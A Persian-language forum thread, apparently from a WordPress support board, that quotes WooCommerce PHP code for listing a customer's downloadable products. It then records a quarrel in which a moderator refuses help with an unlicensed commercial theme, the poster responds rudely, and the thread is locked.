* Sets session data for the tax exemption.
*
* @access public
* @param mixed $is_vat_exempt
* @return void
*/
public function set_is_vat_exempt( $is_vat_exempt ) {
$this->is_vat_exempt = $is_vat_exempt;
}

/**
* calculated_shipping function.
*
* @access public
* @param mixed $calculated
* @return void
*/
public function calculated_shipping( $calculated = true ) {
$this->calculated_shipping = $calculated;
}

/**
* Gets a user's downloadable products if they are logged in.
*
* @access public
* @return array Array of downloadable products
*/
public function get_downloadable_products() {
global $wpdb, $woocommerce;
$downloads = array();
if ( is_user_logged_in() ) :
$user_info = get_userdata( get_current_user_id() );
$results = $wpdb->get_results( $wpdb->prepare("SELECT * FROM ".$wpdb->prefix."woocommerce_downloadable_product_permissions WHERE user_id = '%s' ORDER BY order_id, product_id, download_id", get_current_user_id()) );
$_product = null;
$order = null;
$file_number = 0;
if ($results) foreach ($results as $result) :
if ($result->order_id>0) :
if ( ! $order || $order->id != $result->order_id ) {
// new order
$order = new WC_Order( $result->order_id );
$_product = null;
}
// order exists and downloads permitted?
if ( ! $order->id || ! $order->is_download_permitted() || $order->post_status != 'publish' ) continue;
if ( ! $_product || $_product->id != $result->product_id ) :
// new product
$file_number = 0;
$_product = get_product( $result->product_id );
endif;
if ( ! $_product || ! $_product->exists() ) continue;
if ( ! $_product->has_file( $result->download_id ) ) continue;
// Download name will be 'Product Name' for products with a single downloadable file, and 'Product Name - File X' for products with multiple files
$download_name = apply_filters(
'woocommerce_downloadable_product_name',
$_product->get_title() . ( $file_number > 0 ? ' — ' . sprintf( __( 'File %d', 'woocommerce' ), $file_number + 1 ) : '' ),
$_product,
$result->download_id,
$file_number
);
// Rename previous download with file number if there are multiple files only
if ( $file_number == 1 ) {
$previous_result = &$downloads[count($downloads)-1];
$previous_product = get_product($previous_result['product_id']);
$previous_result['download_name'] = apply_filters(
'woocommerce_downloadable_product_name',
$previous_result['download_name']. ' — ' . sprintf( __('File %d', 'woocommerce' ), $file_number ),
$previous_product,
$previous_result['download_id'],
0
);
}
$downloads[] = array(
'download_url' => add_query_arg( array( 'download_file' => $result->product_id, 'order' => $result->order_key, 'email' => $result->user_email, 'key' => $result->download_id ), trailingslashit( home_url( '', 'http' ) ) ),
'download_id' => $result->download_id,
'product_id' => $result->product_id,
'download_name' => $download_name,
'order_id' => $order->id,
'order_key' => $order->order_key,
'downloads_remaining' => $result->downloads_remaining
);
$file_number++;
endif;
endforeach;
endif;
return apply_filters('woocommerce_customer_get_downloadable_products', $downloads);
}
}

0

به اشتراک گذاری این پست


لینک به پست

شما مثل اینکه متوجه عرض بنده نشدی

قالب شما تجاری است و من تا همین حد هم بیش از اندازه راهنمایی کردم و قوانین سایت را لغو کرده ام

استفاده از قالب تجاری مانند سرقت است

اینکه انتظار داشته باشیم که کسی به صورت رایگان در استفاده از مال سرقت شده کمکمان کند توقع زیادی نیست؟

3

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

شما مثل اینکه متوجه عرض بنده نشدی

قالب شما تجاری است و من تا همین حد هم بیش از اندازه راهنمایی کردم و قوانین سایت را لغو کرده ام

استفاده از قالب تجاری مانند سرقت است

اینکه انتظار داشته باشیم که کسی به صورت رایگان در استفاده از مال سرقت شده کمکمان کند توقع زیادی نیست؟

دوتا راهنمایی کردی که اونم به جایی نرسید

سرچ رو که من با بزرگ کردن لوگو مخفی کردم اصلا اون کدی که گفتی بیا ببین هست :angry:

دزد اونی هایی هستند که 3000 هزار میلیارد رو با هم میربن بقیه :blink: تخمش نیستن

نه منی که برای در اوردن خرج زندگی و دانشگام کونم داره پاره میشه

فهمیدی

ویرایش شده در توسط p30msb
0

به اشتراک گذاری این پست


لینک به پست

من کاری ندارم شما از چه ابزاری استفاده می کنید ولی وظیفه خودم نمی دانم برای ابزاری که رعایت کپی رایتشون نشده خدماتی بدم

در ضمن لازمه که قبل از سایت داری ادب رو بیاموزید

اینکه خرج زندگی زیاد باشه و اینکه یکنفر چندهزار میلیارد را برده دلیل نقض قوانین انجمنی که داخلشید نیست

حداقل به عنوان یک دارنده سایت موظفید قانون انجمنی که واردش می شوید را بخوانید

3

به اشتراک گذاری این پست


لینک به پست
مهمان
این موضوع برای عدم ارسال قفل گردیده است.